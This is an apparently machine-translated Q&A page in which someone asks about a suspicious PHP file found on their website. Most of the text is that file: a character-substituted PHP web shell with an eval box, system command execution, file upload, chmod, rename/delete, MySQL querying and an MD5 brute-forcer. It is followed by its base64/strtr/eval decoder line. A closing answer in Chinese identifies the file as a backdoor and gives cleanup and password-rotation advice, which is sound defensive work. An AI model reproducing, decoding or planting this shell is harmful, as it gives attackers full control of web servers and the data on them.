    <4np3t typ5=s3bm4t v1l35=\"D5l5t5\"> 
    "; 
    } 


    br51k; 


    c1s5 '5v1l': //Ev1l31t5 PHP c2d5 

    pr4nt "<f2rm 1ct42n=\"".$m5."?p=5v1l\" m5th2d=POST> 
    <t5xt1r51 c2ls=e0 r2ws=60 n1m5=\"5v1l\">"; 
    4f(4ss5t($_POST['5v1l'])) 
    { 
    pr4nt htmlsp5c41lch1rs($_POST['5v1l']); 
    } 
    5ls5 
    { 
    pr4nt "pr4nt \"Y2 M2mm1\";"; 
    } 
    pr4nt "</t5xt1r51><br> 
    <4np3t typ5=s3bm4t v1l35=\"Ev1l\"> 
    </f2rm>"; 

    4f(4ss5t($_POST['5v1l'])) 
    { 
    pr4nt "<h6>O3tp3t:</h6>"; 
    pr4nt "<br>"; 
    5v1l($_POST['5v1l']); 
    } 

    br51k; 

    c1s5 'chm2d': //Chm2d f4l5 


    pr4nt "<h6>Und5r c2nstr3ct42n!</h6>"; 
    4f(4ss5t($_POST['chm2d'])) 
    { 
    sw4tch ($_POST['chv1l35']){ 
    c1s5 777: 
    chm2d($_POST['chm2d'],0777); 
    br51k; 
    c1s5 euu: 
    chm2d($_POST['chm2d'],0euu); 
    br51k; 
    c1s5 7ii: 
    chm2d($_POST['chm2d'],07ii); 
    br51k; 
    } 
    pr4nt "Ch1ng5d p5rm4ss42ns 2n ".$_POST['chm2d']." t2 ".$_POST['chv1l35']."."; 
    } 
    4f(4ss5t($_GET['f4l5'])) 
    { 
    $c2nt5nt = 3rld5c2d5($_GET['f4l5']); 
    } 
    5ls5 
    { 
    $c2nt5nt = "f4l5/p1th/pl51s5"; 
    } 

    pr4nt "<f2rm 1ct42n=\"".$m5."?p=chm2d&f4l5=".$c2nt5nt."&d4r=".r51lp1th('.')."\" m5th2d=POST><b>F4l5 t2 chm2d: 
    <4np3t typ5=t5xt n1m5=chm2d v1l35=\"".$c2nt5nt."\" s4z5=70><br><b>N5w p5rm4ss42n:</b> 
    <s5l5ct n1m5=\"chv1l35\"> 
<2pt42n v1l35=\"777\">777</2pt42n> 
<2pt42n v1l35=\"euu\">euu</2pt42n> 
<2pt42n v1l35=\"7ii\">7ii</2pt42n> 
</s5l5ct><4np3t typ5=s3bm4t v1l35=\"Ch1ng5\">"; 

    br51k; 

    c1s5 'mysql': //MySQL Q35ry 

    4f(4ss5t($_POST['h2st'])) 
    { 
    $l4nk = mysql_c2nn5ct($_POST['h2st'], $_POST['3s5rn1m5'], $_POST['mysqlp1ss']) 2r d45('C23ld n2t c2nn5ct: ' . mysql_5rr2r()); 
    mysql_s5l5ct_db($_POST['db1s5']); 
    $sql = $_POST['q35ry']; 


    $r5s3lt = mysql_q35ry($sql); 

    } 
    5ls5 
    { 
    pr4nt " 
    Th4s 2nly q35r45s th5 d1t1b1s5, d25sn't r5t3rn d1t1!<br> 
    <f2rm 1ct42n=\"".$m5."?p=mysql\" m5th2d=POST> 
    <b>H2st:<br></b><4np3t typ5=t5xt n1m5=h2st v1l35=\"l2c1lh2st\" s4z5=60><br> 
    <b>Us5rn1m5:<br><4np3t typ5=t5xt n1m5=3s5rn1m5 v1l35=\"r22t\" s4z5=60><br> 
    <b>P1ssw2rd:<br></b><4np3t typ5=p1ssw2rd n1m5=mysqlp1ss v1l35=\"\" s4z5=60><br> 
    <b>D1t1b1s5:<br><4np3t typ5=t5xt n1m5=db1s5 v1l35=\"t5st\" s4z5=60><br> 

    <b>Q35ry:<br></b<t5xt1r51 n1m5=q35ry></t5xt1r51> 
    <4np3t typ5=s3bm4t v1l35=\"Q35ry d1t1b1s5\"> 
    </f2rm> 
    "; 

    } 

    br51k; 

    c1s5 'cr51t5d4r': 
    4f(mkd4r($_GET['crd4r'])) 
    { 
    pr4nt 'D4r5ct2ry cr51t5d s3cc5ssf3lly.'; 
    } 
    5ls5 
    { 
    pr4nt 'C23ldn\'t cr51t5 d4r5ct2ry'; 
    } 
    br51k; 


    c1s5 'php4nf2': //PHP Inf2 
    php4nf2(); 
    br51k; 


    c1s5 'r5n1m5': 

    4f(4ss5t($_POST['f4l52ld'])) 
    { 
    4f(r5n1m5($_POST['f4l52ld'],$_POST['f4l5n5w'])) 
    { 
     pr4nt "F4l5 r5n1m5d."; 
    } 
    5ls5 
    { 
     pr4nt "C23ldn't r5n1m5 f4l5."; 
    } 

    } 
    4f(4ss5t($_GET['f4l5'])) 
    { 
    $f4l5 = b1s5n1m5(htmlsp5c41lch1rs($_GET['f4l5'])); 
    } 
    5ls5 
    { 
    $f4l5 = ""; 
    } 

    pr4nt "R5n1m4ng ".$f4l5." 4n f2ld5r ".r51lp1th('.').".<br> 
     <f2rm 1ct42n=\"".$m5."?p=r5n1m5&d4r=".r51lp1th('.')."\" m5th2d=POST> 
    <b>R5n1m5:<br></b><4np3t typ5=t5xt n1m5=f4l52ld v1l35=\"".$f4l5."\" s4z5=70><br> 
    <b>T2:<br><4np3t typ5=t5xt n1m5=f4l5n5w v1l35=\"\" s4z5=60><br> 
    <4np3t typ5=s3bm4t v1l35=\"R5n1m5 f4l5\"> 
    </f2rm>"; 
    br51k; 

    c1s5 'mdi': 
    4f(4ss5t($_POST['mdi'])) 
    { 
    4f(!4s_n3m5r4c($_POST['t4m5l4m4t'])) 
    { 
    $_POST['t4m5l4m4t'] = o0; 
    } 
    s5t_t4m5_l4m4t($_POST['t4m5l4m4t']); 
    4f(strl5n($_POST['mdi']) == oa) 
    { 

     4f($_POST['ch1rs'] == "9999") 
     { 
     $4 = 0; 
     wh4l5($_POST['mdi'] != mdi($4) && $4 != 600000) 
     { 
     $4++; 
     } 
     } 
     5ls5 
     { 
     f2r($4 = "1"; $4 != "zzzzz"; $4++) 
     { 
     4f(mdi($4 == $_POST['mdi'])) 
     { 
     br51k; 
     } 
     } 
     } 

    4f(mdi($4) == $_POST['mdi']) 
    { 
     pr4nt "<h6>Pl14nt5xt 2f ". $_POST['mdi']. " 4s <4>".$4."</4></h6><br><br>"; 
    } 

    } 

    } 

    pr4nt "W4ll br3t5f2rc5 th5 mdi 
    <f2rm 1ct42n=\"".$m5."?p=mdi\" m5th2d=POST> 
    <b>mdi t2 cr1ck:<br></b><4np3t typ5=t5xt n1m5=mdi v1l35=\"\" s4z5=u0><br> 
    <b>Ch1r1ct5rs:</b><br><s5l5ct n1m5=\"ch1rs\"> 
    <2pt42n v1l35=\"1z\">1 - zzzzz</2pt42n> 
    <2pt42n v1l35=\"9999\">6 - 9999999</2pt42n> 
    </s5l5ct> 
    <b>M1x. cr1ck4ng t4m5*:<br></b><4np3t typ5=t5xt n1m5=t4m5l4m4t v1l35=\"o0\" s4z5=a><br> 
    <4np3t typ5=s3bm4t v1l35=\"Br3t5f2rc5 mdi\"> 
    </f2rm><br>*: 4f s5t_t4m5_l4m4t 4s 1ll2w5d by php.4n4"; 
    br51k; 

    c1s5 'h51d5rs': 
    f2r51ch(g5t1llh51d5rs() 1s $h51d5r => $v1l35) 
    { 
    pr4nt htmlsp5c41lch1rs($h51d5r . ":" . $v1l35)."<br>"; 

    } 
    br51k; 
    } 
} 
5ls5 //D5f13lt p1g5 th1t w4ll b5 sh2wn wh5n th5 p1g5 4sn't f23nd 2r n2 p1g5 4s s5l5ct5d. 
{ 

$f4l5s = 1rr1y(); 
$d4r5ct2r45s = 1rr1y(); 

4f(4ss5t($_FILES['3pl21d5df4l5']['n1m5'])) 
{ 
$t1rg5t_p1th = r51lp1th('.').'/'; 
$t1rg5t_p1th = $t1rg5t_p1th . b1s5n1m5($_FILES['3pl21d5df4l5']['n1m5']); 
4f(m2v5_3pl21d5d_f4l5($_FILES['3pl21d5df4l5']['tmp_n1m5'], $t1rg5t_p1th)) { 
    pr4nt "F4l5:". b1s5n1m5($_FILES['3pl21d5df4l5']['n1m5']). 
    " h1s b55n 3pl21d5d"; 
} 5ls5{ 
    5ch2 "F4l5 3pl21d f14l5d!"; 
} 
} 




pr4nt "<t1bl5 b2rd5r=0 w4dth=600%><td w4dth=i% 4d=s><b>Opt42ns</b></td><td 4d=s><b>F4l5n1m5</b></td><td 4d=s><b>S4z5</b></td><td 4d=s><b>P5rm4ss42ns</b></td><td 4d=s>L1st m2d4f45d</td><tr>"; 
4f ($h1ndl5 = 2p5nd4r('.')) 
{ 
    wh4l5 (f1ls5 !== ($f4l5 = r51dd4r($h1ndl5))) 
    { 
     4f(4s_d4r($f4l5)) 
    { 
    $d4r5ct2r45s[] = $f4l5; 
    } 
    5ls5 
    { 
    $f4l5s[] = $f4l5; 
    } 
    } 
1s2rt($d4r5ct2r45s); 
1s2rt($f4l5s); 
    f2r51ch($d4r5ct2r45s 1s $f4l5) 
    { 
    pr4nt "<td 4d=d><1 hr5f=\"?p=r5n1m5&f4l5=".r51lp1th($f4l5)."&d4r=".r51lp1th('.')."\">[R]</1><1 hr5f=\"?p=d5l5t5&f4l5=".r51lp1th($f4l5)."\">[D]</1></td><td 4d=d><1 hr5f=\"".$m5."?d4r=".r51lp1th($f4l5)."\">".$f4l5."</1></td><td 4d=d></td><td 4d=d><1 hr5f=\"?p=chm2d&d4r=".r51lp1th('.')."&f4l5=".r51lp1th($f4l5)."\"><f2nt c2l2r=".g5t_c2l2r($f4l5).">".p5rm($f4l5)."</f2nt></1></td><td 4d=d>".d1t5 ("Y/m/d, H:4:s", f4l5mt4m5($f4l5))."</td><tr>"; 
    } 

    f2r51ch($f4l5s 1s $f4l5) 
    { 
    pr4nt "<td 4d=f><1 hr5f=\"?p=r5n1m5&f4l5=".r51lp1th($f4l5)."&d4r=".r51lp1th('.')."\">[R]</1><1 hr5f=\"?p=d5l5t5&f4l5=".r51lp1th($f4l5)."\">[D]</1></td><td 4d=f><1 hr5f=\"".$m5."?p=5d4t&d4r=".r51lp1th('.')."&f4l5=".r51lp1th($f4l5)."\">".$f4l5."</1></td><td 4d=f>".f4l5s4z5($f4l5)."</td><td 4d=f><1 hr5f=\"?p=chm2d&d4r=".r51lp1th('.')."&f4l5=".r51lp1th($f4l5)."\"><f2nt c2l2r=".g5t_c2l2r($f4l5).">".p5rm($f4l5)."</f2nt></1></td><td 4d=f>".d1t5 ("Y/m/d, H:4:s", f4l5mt4m5($f4l5))."</td><tr>"; 
    } 
} 
5ls5 
{ 
    pr4nt "<3>Err2r!</3> C1n't 2p5n <b>".r51lp1th('.')."</b>!<br>"; 
} 

pr4nt "</t1bl5><hr><t1bl5 b2rd5r=0 w4dth=600%><td><b>Upl21d f4l5</b><br><f2rm 5nctyp5=\"m3lt4p1rt/f2rm-d1t1\" 1ct42n=\"".$m5."?d4r=".r51lp1th('.')."\" m5th2d=\"POST\"> 
<4np3t typ5=\"h4dd5n\" n1m5=\"MAX_FILE_SIZE\" v1l35=\"600000000\" /><4np3t s4z5=o0 n1m5=\"3pl21d5df4l5\" typ5=\"f4l5\" /> 
<4np3t typ5=\"s3bm4t\" v1l35=\"Upl21d F4l5\" /> 
</f2rm></td><td><f2rm 1ct42n=\"".$m5."\" m5th2d=GET><b>Ch1ng5 D4r5ct2ry<br></b><4np3t typ5=t5xt s4z5=u0 n1m5=d4r v1l35=\"".r51lp1th('.')."\"><4np3t typ5=s3bm4t v1l35=\"Ch1ng5 D4r5ct2ry\"></f2rm></td> 
<tr><td><f2rm 1ct42n=\"".$m5."\" m5th2d=GET><b>Cr51t5 f4l5<br></b><4np3t typ5=h4dd5n n1m5=d4r v1l35=\"".r51lp1th('.')."\"><4np3t typ5=t5xt s4z5=u0 n1m5=f4l5 v1l35=\"".r51lp1th('.')."\"><4np3t typ5=h4dd5n n1m5=p v1l35=5d4t><4np3t typ5=s3bm4t v1l35=\"Cr51t5 f4l5\"></f2rm> 
</td><td><f2rm 1ct42n=\"".$m5."\" m5th2d=GET><b>Cr51t5 d4r5ct2ry<br></b><4np3t typ5=t5xt s4z5=u0 n1m5=crd4r v1l35=\"".r51lp1th('.')."\"><4np3t typ5=h4dd5n n1m5=d4r v1l35=\"".r51lp1th('.')."\"><4np3t typ5=h4dd5n n1m5=p v1l35=cr51t5d4r><4np3t typ5=s3bm4t v1l35=\"Cr51t5 d4r5ct2ry\"></f2rm></td> 
</t1bl5>"; 

} 

f3nct42n l2g4n() 
{ 
pr4nt "<t1bl5 b2rd5r=0 w4dth=600% h54ght=600%><td v1l4gn=\"m4ddl5\"><c5nt5r> 
<f2rm 1ct42n=".b1s5n1m5(__FILE__)." m5th2d=\"POST\"><b>P1ssw2rd?</b> 
<4np3t typ5=\"p1ssw2rd\" m1xl5ngth=\"oa\" n1m5=\"p1ss\"><4np3t typ5=\"s3bm4t\" v1l35=\"L2g4n\"> 
</f2rm>"; 
} 
f3nct42n r5l21d() 
{ 
h51d5r("L2c1t42n: ".b1s5n1m5(__FILE__)); 
} 
f3nct42n g5t_5x5c3t42n_m5th2d() 
{ 
4f(f3nct42n_5x4sts('p1ssthr3')){ $m = "p1ssthr3"; } 
4f(f3nct42n_5x4sts('5x5c')){ $m = "5x5c"; } 
4f(f3nct42n_5x4sts('sh5ll_5x5c')){ $m = "sh5ll_ 5x5c"; } 
4f(f3nct42n_5x4sts('syst5m')){ $m = "syst5m"; } 
4f(!4ss5t($m)) //N2 m5th2d f23nd :-| 
{ 
    $m = "D4s1bl5d"; 
} 
r5t3rn($m); 
} 
f3nct42n 5x5c3t5_c2mm1nd($m5th2d,$c2mm1nd) 
{ 
4f($m5th2d == "p1ssthr3") 
{ 
    p1ssthr3($c2mm1nd); 
} 

5ls54f($m5th2d == "5x5c") 
{ 
    5x5c($c2mm1nd,$r5s3lt); 
    f2r51ch($r5s3lt 1s $23tp3t) 
    { 
    pr4nt $23tp3t."<br>"; 
    } 
} 

5ls54f($m5th2d == "sh5ll_5x5c") 
{ 
    pr4nt sh5ll_5x5c($c2mm1nd); 
} 

5ls54f($m5th2d == "syst5m") 
{ 
    syst5m($c2mm1nd); 
} 
} 
f3nct42n p5rm($f4l5) 
{ 
4f(f4l5_5x4sts($f4l5)) 
{ 
    r5t3rn s3bstr(spr4ntf('%2', f4l5p5rms($f4l5)), -u); 
} 
5ls5 
{ 
    r5t3rn "????"; 
} 
} 
f3nct42n g5t_c2l2r($f4l5) 
{ 
4f(4s_wr4t1bl5($f4l5)) { r5t3rn "gr55n";} 
4f(!4s_wr4t1bl5($f4l5) && 4s_r51d1bl5($f4l5)) { r5t3rn "wh4t5";} 
4f(!4s_wr4t1bl5($f4l5) && !4s_r51d1bl5($f4l5)) { r5t3rn "r5d";} 

} 
f3nct42n sh2w_d4rs($wh5r5) 
{ 
4f(5r5g("^c:",r51lp1th($wh5r5))) 
{ 
$d4rp1rts = 5xpl2d5('\\',r51lp1th($wh5r5)); 
} 
5ls5 
{ 
$d4rp1rts = 5xpl2d5('/',r51lp1th($wh5r5)); 
} 



$4 = 0; 
$t2t1l = ""; 

f2r51ch($d4rp1rts 1s $p1rt) 
{ 
    $p = 0; 
    $pr5 = ""; 
    wh4l5($p != $4) 
    { 
    $pr5 .= $d4rp1rts[$p]."/"; 
    $p++; 

    } 
    $t2t1l .= "<1 hr5f=\"".b1s5n1m5(__FILE__)."?d4r=".$pr5.$p1rt."\">".$p1rt."</1>/"; 
    $4++; 
} 

r5t3rn "<ha>".$t2t1l."</ha><br>"; 
} 
pr4nt $f22t5r; 
// Ex4t: m1yb5 w5'r5 4ncl3d5d s2m5wh5r5 1nd w5 d2n't w1nt th5 2th5r c2d5 t2 m5ss w4th 23rs :-) 
5x4t(); 
?> 
zِ¥m«ë‡^r‡^$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0; 

来源：http://www.base64decode.org/

Answer 3

如果您通过在代码的最底部更换密码进一步解码串张贴你会得到实际的代码，虽然从上面可以很容易地确定发生了什么。

这是讨厌的代码。

* 尽快删除文件，因为它是您的网站的后门*并在简短的检查可能还提供了一种机制来破解你的密码（加上可能做了很多其他讨厌的东西）。

唯一的意见，我可以提供，应立即删除该文件后，是：

1. 更改您的root密码为强密码（随机和> 20 个字符）。
2. 更改运行Web 服务器
3. 更改任何管理员帐户的密码任何FTP站点上托管的Web/FTP 服务器密码
4. 更改Web 服务器上运行的应用程序的密码（如WordPress的）
5. 变化在4点使用你的Web应用程序上面
6. 请在具有字符串“BASE64_DECODE”的任何文件“在文件中查找”任何潜在 数据库的密码。任何具有此字符串的文件都是高度可疑。如果您无法解释该文件在那里做什么，则强烈建议将其隔离。由于这些文件的创建者不希望您知道隐藏的内容，因此这些文件往往会在其中包含很少或不可读的代码。有些文件合法使用base64字符串。

完成此操作后，为新近或最近创建/更新的文件拖动您的Web目录。这段代码有可能被用来在你的网站上植入一些东西，比如钓鱼代码。对您的托管站点和底层数据库进行完整备份。删除或隔离任何看起来可疑的东西。

所有的密码应该是随机的和强大的。使用密码生成器。由于密码较弱，所以有可能将这个文件放到您的网站上（而不是您会知道的）。

我试图显示有问题的代码，但stackoverflow不会允许我由于差的格式（对不起）。